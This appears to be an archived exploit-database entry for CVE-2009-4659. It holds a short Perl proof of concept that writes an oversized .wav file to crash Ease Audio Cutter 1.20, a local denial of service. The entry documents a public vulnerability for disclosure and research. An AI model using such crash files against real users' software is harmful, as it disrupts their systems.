Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)

Author: zAx
type: dos
platform: windows
port: 
date_added: 2009-09-16  
date_updated:   
verified: 1  
codes: OSVDB-62748;CVE-2009-4659  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9707.pl  
#!/usr/bin/perl
###########################################################################
#             Ease Audio Cutter 1.20 (.wav file) Local Crash PoC          #
#                               By : zAx                                  #
###########################################################################
#             Application Homepage : http://mp3-cutter.com                #
#   Application Download : http://mp3-cutter.com/download/audiocutter.exe #
# Description : Click Select file button, select our file and click Play  #
###########################################################################
$crash = "\x42" x 15000;
my $file = "zAx_Crash.wav";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $crash;
close($FILE);
print "Done \n";

# milw0rm.com [2009-09-17]